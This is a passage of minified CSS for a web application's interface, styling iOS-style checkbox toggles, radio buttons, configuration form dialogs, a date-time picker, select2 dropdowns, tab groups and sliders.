cubic-bezier(.54,1.85,.5,1);-ms-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);transition:all 0.4s cubic-bezier(.54,1.85,.5,1);box-shadow:0 1px 3px rgba(0,0,0,0.4);pointer-events:none;} input[type="checkbox"].kui-checkbox-ios:checked +em{ background-color:#64bd63;border:1px solid #64bd63;} input[type="checkbox"].kui-checkbox-ios:checked +em:after{ background-color:#ffffff;box-shadow:0px 2px 5px rgba(0,0,0,0.3);} input[type="checkbox"].kui-checkbox-ios.size-smallx +em{ width:20px;height:10px;} input[type="checkbox"].kui-checkbox-ios.size-smallx +em:after{ width:8px;height:8px;} input[type="checkbox"].kui-checkbox-ios.size-smallx:checked +em:after{ margin-left:11px;} input[type="checkbox"].kui-checkbox-ios.size-small +em{ width:30px;height:15px;} input[type="checkbox"].kui-checkbox-ios.size-small +em:after{ width:13px;height:13px;} input[type="checkbox"].kui-checkbox-ios.size-small:checked +em:after{ margin-left:16px;} input[type="checkbox"].kui-checkbox-ios +em{ width:40px;height:20px;} input[type="checkbox"].kui-checkbox-ios +em:after{ width:18px;height:18px;} input[type="checkbox"].kui-checkbox-ios:checked +em:after{ margin-left:21px;} input[type="checkbox"].kui-checkbox-ios.size-big +em{ width:50px;height:25px;} input[type="checkbox"].kui-checkbox-ios.size-big +em:after{ width:23px;height:23px;} input[type="checkbox"].kui-checkbox-ios.size-big:checked +em:after{ margin-left:26px;} input[type="checkbox"].kui-checkbox-ios.size-bigx +em{ width:80px;height:40px;} input[type="checkbox"].kui-checkbox-ios.size-bigx +em:after{ width:38px;height:38px;} input[type="checkbox"].kui-checkbox-ios.size-bigx:checked +em:after{ margin-left:41px;} input[type="checkbox"].kui-checkbox-ios:checked +em{ background-color:#63acff;border:1px solid #63acff;box-shadow:inset 0 0 0 10px #63acff;} input[type="checkbox"].kui-checkbox-ios.red:checked +em{ background-color:#ff5722;border:1px solid #ff5722;box-shadow:inset 0 0 0 10px #ff5722;} input[type="checkbox"].kui-checkbox-ios.blue:checked +em{ background-color:#63acff;border:1px solid #63acff;box-shadow:inset 0 0 0 10px #63acff;} input[type="checkbox"].kui-checkbox-ios.green:checked +em{ background-color:#64bd63;border:1px solid #64bd63;box-shadow:inset 0 0 0 10px #64bd63;} input[type="checkbox"].kui-checkbox-ios.yellow:checked +em{ background-color:#ffc107;border:1px solid #ffc107;box-shadow:inset 0 0 0 10px #ffc107;} input[type="checkbox"].kui-checkbox-ios.grey:checked +em{ background-color:#aaa;border:1px solid #aaa;box-shadow:inset 0 0 0 10px #aaa;} input[type="checkbox"].kui-checkbox-ios.black:checked +em{ background-color:#444;border:1px solid #444;box-shadow:inset 0 0 0 10px #444;} input[type="checkbox"].kui-checkbox{ background:#f6f6f6;cursor:pointer;border:1px solid #ddd !important;outline:none;text-align:center;border-radius:10%;display:inline-block;background-clip:padding-box;appearance:none;-moz-appearance:none;-webkit-appearance:none;} input[type="checkbox"].kui-checkbox:before{ font-family:FontAwesome;content:"\f00c";color:#f6f6f6;} input[type="checkbox"].kui-checkbox:checked{ background:#1b7e5a;border-color:#1b7e5a !important;} input[type="checkbox"].kui-checkbox:checked:before{ color:#fff;} input[type="checkbox"].kui-checkbox:checked:hover, input[type="checkbox"].kui-checkbox:checked:focus{ box-shadow:none !important;} input[type="checkbox"].kui-checkbox:hover, input[type="checkbox"].kui-checkbox:focus{ border-color:#1b7e5a !important;box-shadow:0 0 0 1px #1b7e5a !important;} input[type="checkbox"].kui-checkbox.radius{ border-radius:999px;} input[type="checkbox"].kui-checkbox.size-smallx{ height:16px;font-size:9.6px;width:16px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-smallx:before{ line-height:16px;} input[type="checkbox"].kui-checkbox.size-small{ height:18px;font-size:10.8px;width:18px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-small:before{ line-height:18px;} input[type="checkbox"].kui-checkbox{ height:20px;font-size:12px;width:20px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox:before{ line-height:20px;} input[type="checkbox"].kui-checkbox.size-big{ height:26px;font-size:15.6px;width:26px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-big:before{ line-height:26px;} input[type="checkbox"].kui-checkbox.size-bigx{ height:32px;font-size:19.2px;width:32px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-bigx:before{ line-height:32px;} input[type="checkbox"].kui-checkbox:checked{ background:#63acff;border-color:#63acff !important;} input[type="checkbox"].kui-checkbox:hover, input[type="checkbox"].kui-checkbox:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="checkbox"].kui-checkbox.red:checked{ background:#ff5722;border-color:#ff5722 !important;} input[type="checkbox"].kui-checkbox.red:hover, input[type="checkbox"].kui-checkbox.red:focus{ border-color:#ff5722 !important;box-shadow:0 0 0 1px #ff5722 !important;} input[type="checkbox"].kui-checkbox.blue:checked{ background:#63acff;border-color:#63acff !important;} input[type="checkbox"].kui-checkbox.blue:hover, input[type="checkbox"].kui-checkbox.blue:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="checkbox"].kui-checkbox.green:checked{ background:#64bd63;border-color:#64bd63 !important;} input[type="checkbox"].kui-checkbox.green:hover, input[type="checkbox"].kui-checkbox.green:focus{ border-color:#64bd63 !important;box-shadow:0 0 0 1px #64bd63 !important;} input[type="checkbox"].kui-checkbox.yellow:checked{ background:#ffc107;border-color:#ffc107 !important;} input[type="checkbox"].kui-checkbox.yellow:hover, input[type="checkbox"].kui-checkbox.yellow:focus{ border-color:#ffc107 !important;box-shadow:0 0 0 1px #ffc107 !important;} input[type="checkbox"].kui-checkbox.grey:checked{ background:#aaa;border-color:#aaa !important;} input[type="checkbox"].kui-checkbox.grey:hover, input[type="checkbox"].kui-checkbox.grey:focus{ border-color:#aaa !important;box-shadow:0 0 0 1px #aaa !important;} input[type="checkbox"].kui-checkbox.black:checked{ background:#444;border-color:#444 !important;} input[type="checkbox"].kui-checkbox.black:hover, input[type="checkbox"].kui-checkbox.black:focus{ border-color:#444 !important;box-shadow:0 0 0 1px #444 !important;} input[type="radio"].kui-radio{ background:#f6f6f6;cursor:pointer;border:1px solid #ddd !important;outline:none;border-radius:999px;display:inline-block;text-align:center;-webkit-transition:all 0.2s ease-in-out;-moz-transition:all 0.2s ease-in-out;-o-transition:all 0.2s ease-in-out;-ms-transition:all 0.2s ease-in-out;transition:all 0.2s ease-in-out;background-clip:padding-box;box-shadow:0 1px 2px rgba(0,0,0,0.05), inset 0px -15px 10px -12px rgba(0,0,0,0.05);appearance:none;-moz-appearance:none;-webkit-appearance:none;} input[type="radio"].kui-radio:before{ font-family:FontAwesome;content:"\f00c";color:#f6f6f6;} input[type="radio"].kui-radio:checked:before{ color:#fff;} input[type="radio"].kui-radio:checked:hover, input[type="radio"].kui-radio:checked:focus{ box-shadow:none !important;} input[type="radio"].kui-radio:hover, input[type="radio"].kui-radio:focus{ border-color:#224 !important;} input[type="radio"].kui-radio.size-smallx{ font-size:9.6px;height:16px;width:16px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-smallx:before{ line-height:14px;} input[type="radio"].kui-radio.size-small{ font-size:10.8px;height:18px;width:18px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-small:before{ line-height:16px;} input[type="radio"].kui-radio{ font-size:14.4px;height:24px;width:24px !important;margin-right:0.8em;} input[type="radio"].kui-radio:before{ line-height:22px;} input[type="radio"].kui-radio.size-big{ font-size:15.6px;height:26px;width:26px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-big:before{ line-height:24px;} input[type="radio"].kui-radio.size-bigx{ font-size:19.2px;height:32px;width:32px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-bigx:before{ line-height:30px;} input[type="radio"].kui-radio:checked{ background:#63acff;border-color:#63acff !important;} input[type="radio"].kui-radio:hover, input[type="radio"].kui-radio:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="radio"].kui-radio.red:checked{ background:#ff5722;border-color:#ff5722 !important;} input[type="radio"].kui-radio.red:hover, input[type="radio"].kui-radio.red:focus{ border-color:#ff5722 !important;box-shadow:0 0 0 1px #ff5722 !important;} input[type="radio"].kui-radio.blue:checked{ background:#63acff;border-color:#63acff !important;} input[type="radio"].kui-radio.blue:hover, input[type="radio"].kui-radio.blue:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="radio"].kui-radio.green:checked{ background:#64bd63;border-color:#64bd63 !important;} input[type="radio"].kui-radio.green:hover, input[type="radio"].kui-radio.green:focus{ border-color:#64bd63 !important;box-shadow:0 0 0 1px #64bd63 !important;} input[type="radio"].kui-radio.yellow:checked{ background:#ffc107;border-color:#ffc107 !important;} input[type="radio"].kui-radio.yellow:hover, input[type="radio"].kui-radio.yellow:focus{ border-color:#ffc107 !important;box-shadow:0 0 0 1px #ffc107 !important;} input[type="radio"].kui-radio.grey:checked{ background:#aaa;border-color:#aaa !important;} input[type="radio"].kui-radio.grey:hover, input[type="radio"].kui-radio.grey:focus{ border-color:#aaa !important;box-shadow:0 0 0 1px #aaa !important;} input[type="radio"].kui-radio.black:checked{ background:#444;border-color:#444 !important;} input[type="radio"].kui-radio.black:hover, input[type="radio"].kui-radio.black:focus{ border-color:#444 !important;box-shadow:0 0 0 1px #444 !important;}}.form-box{color:#444;}.form-box a{color:#5d9cec;text-decoration:none;}.form-box a:hover{color:#4a89dc;}.form-box .panel-body{position:relative;}.form-box .panel-body .line,.form-box .panel-body hr{border:none;height:1px;overflow:hidden;background:#ddd;margin:10px 30px;height:2px;background:transparent url("../../../images/common/line.png") repeat-x 0 0;}.form-box .panel-body h1,.form-box .panel-body h2,.form-box .panel-body h3,.form-box .panel-body h4,.form-box .panel-body h5{margin:0.6em 1em 0.5em 30px;padding-bottom:0.4em;border-bottom:1px solid #ddd;}.form-box.config-box .form-header{height:40px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#efefef', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-o-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);-pie-background:linear-gradient(to 60deg,#efefef 0%,#f5f7fa 100%);border-bottom:1px solid #ddd;}.form-box.config-box .form-header .modal-title{height:40px;line-height:40px;padding-left:30px;font-size:14px;}.form-box.config-box .form-header .modal-title img,.form-box.config-box .form-header .modal-title .x-item-file{height:26px;width:26px;line-height:26px;text-align:center;border-radius:15%;display:inline-block;margin-right:10px;padding:0;color:#fff;position:relative;top:8px;}.form-box.config-box .form-header .modal-title img.x-font-icon,.form-box.config-box .form-header .modal-title .x-item-file.x-font-icon{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to 164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));}.form-box.config-box .form-header .modal-title img.font-icon-words,.form-box.config-box .form-header .modal-title .x-item-file.font-icon-words{font-size:10px;}.form-box.config-box .form-header .modal-title i{font-style:normal;}.form-box.config-box .form-header .modal-title img,.form-box.config-box .form-header .modal-title .x-font-icon{top:0px;}.form-box.config-box .panel-body{overflow:auto;border-radius:4px;padding:20px 0;position:absolute;left:0;right:0;top:42px;bottom:71px;margin:0;border:none;background:#fff;}.form-box .form-row{padding:3px 30px;padding-right:5px;width:auto;margin:1px 0;}.form-box .form-row:after{clear:both;}.form-box .form-row.form-group{margin:0;}.form-box .form-row label{margin-right:10px;display:inline;}.form-box .form-row input[type='radio']{display:inline-block;margin-right:10px;}.form-box .form-row input[type='text'],.form-box .form-row input[type='password'],.form-box .form-row input[type='number']{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;display:inline-block;height:28px;width:260px;color:#444;border-radius:4px;padding-left:0.5em;margin-right:10px;}.form-box .form-row input[type='text']:focus,.form-box .form-row input[type='password']:focus,.form-box .form-row input[type='number']:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.form-box .form-row input[type='text']:focus,.form-box .form-row input[type='password']:focus,.form-box .form-row input[type='number']:focus{box-shadow:0 0 0 3px rgba(117,161,240,0.33);}.form-box .form-row select{min-width:268px;}.form-box .form-row textarea{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;width:251px;height:100px;margin-right:10px;border-radius:2px;padding:8px;transition:none;}.form-box .form-row textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.form-box .form-row textarea:focus{box-shadow:0 0 0 3px rgba(117,161,240,0.33);}.form-box .form-row .setting-title{height:30px;line-height:30px;width:140px;margin-right:20px;padding-top:5px;padding-left:5px;float:left;position:relative;text-align:right;}.form-box .form-row .setting-title .require{color:#ff5722;font-size:20px;position:absolute;margin-top:4px;padding:0 0 0 5px;}.form-box .form-row .setting-content{float:left;position:relative;width:70%;padding:5px;border-radius:4px;border:1px solid transparent;}.form-box .form-row .setting-content input.has-btn-right{width:220px;padding-right:40px;}.form-box .form-row .setting-content .input-btn-right{padding:0;margin-left:-50px;position:absolute;width:35px;height:30px;line-height:30px;border-radius:0 4px 4px 0;}.form-box .form-row .setting-content .input-btn-right .font-icon{font-size:14px;width:20px;padding:0 !important;}.form-box .form-row .setting-content input.has-btn-right:focus + .input-btn-right{border-color:#75a1f0;border-left-color:#c7d5ef;}.form-box .form-row .font-icon{padding:0;}.form-box .form-row .user-select{margin:0.5em 0;}.form-box .form-row.form-userSelect .setting-content{background:#f8fcff;padding:10px 5px;margin-top:-5px;}.form-box .form-row.form-userSelect .desc{margin-top:10px;}.form-box .form-row.error .setting-content{background:#ffefed;border-color:#ffb3ae;}.form-box .form-row.form-color .color-picker-view i{width:20px;height:20px;margin-top:5px;box-shadow:0 0 4px #666;display:inline-block;border-radius:2px;}.form-box .form-row .select2-container{width:270px !important;}.form-box .form-row .slider.slider-horizontal{width:260px;margin-right:20px;height:30px;}.form-box .form-row .slider .tooltip{pointer-events:none;}.form-box .form-row .desc,.form-box .form-row .setting-content i{color:#9ba3af;font-style:normal;}.form-box .ztree.group-list-tree a{border:none;padding-left:3px;}.form-box .ztree.group-list-tree a:hover{border:none;}.form-box .ztree.group-list-tree li a.curSelectedNode{color:#fff;}.form-box .ztree.group-list-tree .sub-menu{float:right;display:none;line-height:20px;padding-right:7px;font-size:1.15em;color:#ddd;}.form-box .ztree.group-list-tree .hover .sub-menu{display:inline-block;color:#666;}.form-box .ztree.group-list-tree .curSelectedNode .sub-menu,.form-box .ztree.group-list-tree .hover.curSelectedNode .sub-menu{display:inline-block;color:#fff;}.form-box-title-left .form-row .setting-title{text-align:left;}body .colorpicker{z-index:99999;}body .dialog-plugin-config.dialog-no-title .aui-outer{box-shadow:0 6px 40px 0 rgba(16,17,18,0.3);border:1px solid #ccc !important;border-radius:4px;overflow:hidden;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close{color:#bbb;color:rgba(0,0,0,0.2);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:active,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:active,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:active{background:rgba(0,0,0,0.12);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:active.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:active.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:active.aui-close{color:#fff;background:#e81123;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-title{height:40px;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons{padding-right:20px;height:40px;border-top:1px solid #ddd;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f2f4f7', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-o-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);-pie-background:linear-gradient(to left,#f2f4f7 0%,#f5f7fa 100%);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons button{margin-top:5px;margin-left:20px;padding:0 2em;height:30px;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons .btn-config-reset{background:none;border:none;box-shadow:none;padding:0px 10px;color:#bbb;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons .btn-config-reset:hover{color:#2196F3;background:#eaf5ff;}div.xdsoft_datetimepicker{border-top:2px solid #39f;padding:0;height:250px;color:#666;}div.xdsoft_datetimepicker .xdsoft_label,div.xdsoft_datetimepicker .xdsoft_month{text-align:center;font-weight:400;}div.xdsoft_datetimepicker .xdsoft_label:hover,div.xdsoft_datetimepicker .xdsoft_month:hover{text-decoration:none;background:#e6f2ff;}div.xdsoft_datetimepicker .xdsoft_label:hover span,div.xdsoft_datetimepicker .xdsoft_month:hover span{color:#20a0ff;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select{box-shadow:0px 2px 10px rgba(0,0,0,0.2);border:1px solid rgba(0,0,0,0.1);max-height:300px;height:200px;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select.xdsoft_monthselect,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select.xdsoft_monthselect{right:0px;width:90px;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select.xdsoft_yearselect,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select.xdsoft_yearselect{right:0px;width:56px;}div.xdsoft_datetimepicker .xdsoft_scrollbar >.xdsoft_scroller{background:rgba(0,0,0,0.3) !important;}div.xdsoft_datetimepicker .xdsoft_calendar td,div.xdsoft_datetimepicker .xdsoft_calendar th{height:30px;text-align:center;background:none;border:none;}div.xdsoft_datetimepicker .xdsoft_calendar td div,div.xdsoft_datetimepicker .xdsoft_calendar th div{padding:0;}div.xdsoft_datetimepicker .xdsoft_calendar th{background:#eee;color:#444;font-weight:400;}div.xdsoft_datetimepicker .xdsoft_datepicker{width:220px;margin-right:10px;}div.xdsoft_datetimepicker .xdsoft_datepicker.active+.xdsoft_timepicker{margin:0;}div.xdsoft_datetimepicker .xdsoft_timepicker{width:70px;border-left:1px solid #ddd;background:#fbfdff;margin:0;margin-left:-1px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_prev,div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_next{margin-left:20px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_time_box{border:none;height:203px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_time_box >div >div{background:none;border:none;}span.select2-container--default .select2-dropdown,span.select2-container--classic .select2-dropdown{box-shadow:0 2px 10px rgba(0,0,0,0.2);border:1px solid #ccc;overflow:hidden;}span.select2-container--default .select2-dropdown .select2-search__field,span.select2-container--classic .select2-dropdown .select2-search__field{border:1px solid #ccc;}span.select2-container--default .select2-selection--multiple,span.select2-container--default .select2-selection--single,span.select2-container--classic .select2-selection--multiple,span.select2-container--classic .select2-selection--single{border:1px solid #ccc;border-radius:4px;outline:none;min-height:32px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice,span.select2-container--default .select2-selection--single .select2-selection__choice,span.select2-container--classic .select2-selection--multiple .select2-selection__choice,span.select2-container--classic .select2-selection--single .select2-selection__choice{background-color:#edf5ff;color:#3a96ff;border-color:#badaff;height:24px;line-height:22px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove,span.select2-container--default .select2-selection--single .select2-selection__choice .select2-selection__choice__remove,span.select2-container--classic .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove,span.select2-container--classic .select2-selection--single .select2-selection__choice .select2-selection__choice__remove{float:right;font-size:15px;color:#3a96ff;width:20px;height:22px;line-height:18px;text-align:center;margin-right:-2px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--default .select2-selection--single .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--classic .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--classic .select2-selection--single .select2-selection__choice .select2-selection__choice__remove:hover{color:#0063d3;}span.select2-container--default.select2-container--focus .select2-selection--multiple,span.select2-container--default.select2-container--focus .select2-selection--single,span.select2-container--classic.select2-container--focus .select2-selection--multiple,span.select2-container--classic.select2-container--focus .select2-selection--single{border:1px solid #3a96ff;}span.select2-container--default .select2-selection--single,span.select2-container--classic .select2-selection--single{background:#f8f8f8 url("../../../images/common//bg.gif") 0px -10px repeat-x;}span.select2-container--default .select2-selection--single .select2-selection__arrow,span.select2-container--classic .select2-selection--single .select2-selection__arrow{height:30px;width:26px;}span.select2-container--default .select2-selection--multiple ul.select2-selection__rendered:after,span.select2-container--classic .select2-selection--multiple ul.select2-selection__rendered:after{content:"";width:23px;height:50%;display:block;color:#aaa;position:absolute;right:1px;top:50%;margin-top:-7px;text-align:center;font-family:FontAwesome;}span.select2-container--default .select2-selection--multiple .select2-search--inline,span.select2-container--classic .select2-selection--multiple .select2-search--inline{height:29px;line-height:23px;}span.select2-container--default .select2-results.group-list-content>.select2-results__options,span.select2-container--classic .select2-results.group-list-content>.select2-results__options{z-index:100;width:100%;height:250px;max-height:250px;}span.select2-container--default .select2-results__option,span.select2-container--classic .select2-results__option{position:relative;}span.select2-container--default .select2-search--inline .select2-search__field,span.select2-container--classic .select2-search--inline .select2-search__field{padding-top:1px;}span.select2-container--default .select2-results__option[aria-selected=true],span.select2-container--default .select2-results__option[aria-selected=true].select2-results__option--highlighted,span.select2-container--classic .select2-results__option[aria-selected=true],span.select2-container--classic .select2-results__option[aria-selected=true].select2-results__option--highlighted{background:#edf5ff;color:#3a96ff;}span.select2-container--default .select2-results__option[aria-selected=true]:after,span.select2-container--classic .select2-results__option[aria-selected=true]:after{content:"\f00c";color:#3a96ff;position:absolute;right:10px;font-size:14px;font-family:FontAwesome;}span.select2-container--default .select2-results__option--highlighted[aria-selected],span.select2-container--classic .select2-results__option--highlighted[aria-selected]{background-color:#eee;color:#444;}span.select2-container--default.select2-container--open.select2-container--above .select2-selection--single,span.select2-container--classic.select2-container--open.select2-container--above .select2-selection--single{border-top:1px solid transparent;}span.select2-container--default.select2-container--open.select2-container--below .select2-selection--multiple,span.select2-container--classic.select2-container--open.select2-container--below .select2-selection--multiple{border-bottom:1px solid transparent;}span.select2-container--default.select2-container--open .select2-dropdown.select2-dropdown--below,span.select2-container--classic.select2-container--open .select2-dropdown.select2-dropdown--below{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);margin-top:-1px;}span.select2-container--default.select2-container--open .select2-dropdown.select2-dropdown--above,span.select2-container--classic.select2-container--open .select2-dropdown.select2-dropdown--above{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);margin-top:1px;box-shadow:0 -2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);}span.select2-container--default.select2-container--open .select2-selection--multiple,span.select2-container--default.select2-container--open .select2-selection--single,span.select2-container--classic.select2-container--open .select2-selection--multiple,span.select2-container--classic.select2-container--open .select2-selection--single{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);}span.select2-container--default .ztree,span.select2-container--classic .ztree{padding:0;}span.select2-container--default .ztree li a,span.select2-container--classic .ztree li a{padding-left:0;height:26px;line-height:26px;border:none;margin:0;border-radius:0;}span.select2-container--default .ztree li a.this,span.select2-container--classic .ztree li a.this{background:#edf5ff;border:none;height:26px;line-height:26px;}span.select2-container--default .ztree li a.this:hover,span.select2-container--classic .ztree li a.this:hover{color:#3a96ff;}span.select2-container--default .ztree li a:hover,span.select2-container--classic .ztree li a:hover{border:none;margin:0;border-radius:0;color:#3a96ff;}span.select2-container--default .ztree .check-icon,span.select2-container--classic .ztree .check-icon{float:right;color:#fff;font-size:12px;text-align:center;width:15px;height:15px;line-height:15px;padding:0;margin-top:5px;margin-right:5px;-webkit-transition:all .1s ease-in-out;-moz-transition:all .1s ease-in-out;-o-transition:all .1s ease-in-out;-ms-transition:all .1s ease-in-out;transition:all .1s ease-in-out;}span.select2-container--default .ztree .check-icon:before,span.select2-container--classic .ztree .check-icon:before{content:"\f";}span.select2-container--default .ztree a.this .check-icon:before,span.select2-container--classic .ztree a.this .check-icon:before{content:"\f00c";color:#3a96ff;}body .select2-container{width:270px;margin-right:10px;}.tab-group{text-align:center;margin-bottom:-12px;}.tab-group .tab-item{background:#fff;text-align:left;display:inline-block;margin-left:-5px;border:1px solid #ccc;border-bottom-color:#a6a6a6;border-right-color:#b8b8b8;}.tab-group .tab-item:hover{background:#e6e6e6;}.tab-group .tab-item:first-child{border-top-left-radius:3px;border-bottom-left-radius:3px;}.tab-group .tab-item:last-child{border-top-right-radius:3px;border-bottom-right-radius:3px;}.tab-group .tab-item a{text-decoration:none;color:#444;padding:0 15px;height:24px;display:inline-block;line-height:24px;}.tab-group .tab-item.active a{color:#fff;}.tab-group .tab-item.active,.tab-group .tab-item.active:hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#6eb4f7', endColorstr='#1a82fb');background-image:-webkit-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-moz-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-o-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-ms-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);-pie-background:linear-gradient(to to bottom,#6eb4f7 0,#1a82fb 100%);color:#fff;z-index:10;border-color:#3f87dc;border-top-color:#4396e6;border-color:#388df8 #388df8 #0866dc transparent;}.tab-group .tab-item.active:hover,.tab-group .tab-item.active:active{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#3e9bf4', endColorstr='#0469de');background-image:-webkit-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-moz-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-o-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-ms-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);-pie-background:linear-gradient(to to bottom,#3e9bf4 0,#0469de 100%);}.tab-group .tab-item:last-child.active,.tab-group .tab-item.active + .tab-item{border-left-color:transparent;}body .slider .slider-track{background:#ddd;box-shadow:none;}body .slider.slider-horizontal .slider-track{height:6px;}body .slider .slider-selection{transition:background-color .3s ease;background:#2196f3;box-shadow:none;}body .slider .slider-handle{margin-left:-7px;margin-top:-6px;width:14px;height:14px;cursor:pointer;border-radius:50%;border:2px solid #88c7f4;background:#fff;transition:border-color .3s ease, transform .3s cubic-bezier(.18,.89,.32,1.28);}body .slider .slider-handle.round:hover{box-shadow:0 0 0 6px rgba(150,219,250,0.7);}body .slider .tooltip{transition:all 0.168s cubic-bezier(0,0.84,0.58,1);}body .slider .tooltip.top{margin-top:-43px;}body .slider .tooltip.bottom{margin-top:20px;}body .slider .tooltip.top .tooltip-arrow{border-top-color:rgba(0,0,0,0.7);}body .slider .tooltip.bottom .tooltip-arrow{border-bottom-color:rgba(0,0,0,0.7);}body .slider .tooltip-inner{background-color:rgba(0,0,0,0.7);box-shadow:0 1px 5px rgba(0,0,0,0.2);padding:8px 15px;}body 